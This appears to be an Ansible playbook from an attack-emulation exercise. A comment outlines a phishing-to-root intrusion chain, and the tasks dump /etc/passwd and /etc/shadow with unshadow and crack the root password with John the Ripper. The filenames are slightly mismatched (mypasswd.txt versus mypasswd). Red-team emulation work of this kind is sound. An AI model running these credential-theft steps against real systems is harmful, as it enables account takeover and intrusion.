---
#
# Stage I: Initial compromise (phishing inject)
#     1. Send phishing email
#     2. Download malicious software
#     3. Obtain contractor's account username and password
#     4. Login to Bullseye webserver as contractor
#     5. Upload shell file to implement command injection 
#     6. Run system command as root on web server
#

- name: cracking the password
  hosts: blackhat
  tasks:
    - name: umask 077
      raw: umask 077 
    - name: unshadow the password
      raw: unshadow /etc/passwd /etc/shadow > mypasswd.txt
    - name: crack the passwd using john ripper
      raw: /home/ubuntu/john-1.8.0/src/john --show --users=root mypasswd
